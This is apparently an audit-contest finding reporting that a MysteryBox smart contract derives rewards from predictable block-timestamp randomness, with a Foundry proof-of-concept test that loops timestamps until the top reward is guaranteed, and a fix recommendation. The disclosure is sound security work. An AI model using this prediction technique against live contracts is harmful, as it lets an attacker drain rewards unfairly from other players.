Submission Details
Severity:
Randomness logic for the openbox function is predictable
Summary
User will be able to predict the randomValue used to determine the type of the box, this can lead to an user always winning the high awarding box which in turn throws the concept of game out of box. A non predictable randomness generator should be used.
Vulnerability Details
POC
function testOpenBoxRewardLogic() public{
//user2 Buying a box
vm.deal(user2,1 ether);
vm.prank(user2);
mysteryBox.buyBox{value: 0.1 ether}();
uint winningGold;
//using the logic to identify the timing of gold
while(winningGold != 99)
{
vm.warp(block.timestamp + 2);
winningGold = uint(keccak256(abi.encodePacked(block.timestamp, address(user2)))) % 100;
console.log(winningGold);
}
vm.prank(user2);
mysteryBox.openBox();
vm.prank(user2);
MysteryBox.Reward[] memory rewards = mysteryBox.getRewards();
console.log(rewards.length);
assertEq(rewards[0].value,1 ether);
}
Impact
An user will always win the highest awarded box which defies the basic logic behind the mystery box contract logic.
Tools Used
=> foundry
=> manual review
Recommendations
Change the method used to determine the randomValue use an unpredictable randomness generator.
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.